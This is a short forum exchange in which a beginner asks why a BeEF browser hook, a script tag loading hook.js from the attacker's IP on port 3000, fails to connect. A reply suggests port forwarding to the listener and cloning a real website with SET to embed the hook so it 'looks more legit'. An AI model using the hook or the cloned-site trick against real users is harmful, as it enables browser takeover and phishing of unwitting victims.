How to Connect with BeEF

So , i started recently reading the Posts on Null Byte and stumbled over BeEF . I tried to do it myself and made a very simple Site with: <script src="http://myip:3000/hook.js " type="text/javascript"></script> . However , it didnt connected and im feeling very dumb because it looked very simple.

Im runnig Linux Kali with a VM.

Are you trying to do it outside your network? If so then use the external IP and forward 3000 to the internal beef listener. I can't think of anything else that would stop beef. Do note that you need to have the page open all the time to have your browser hooked. Also try cloning a website (you could use a cloner in SET) and just add that script inside the cloned html in apache- that looks more legit.
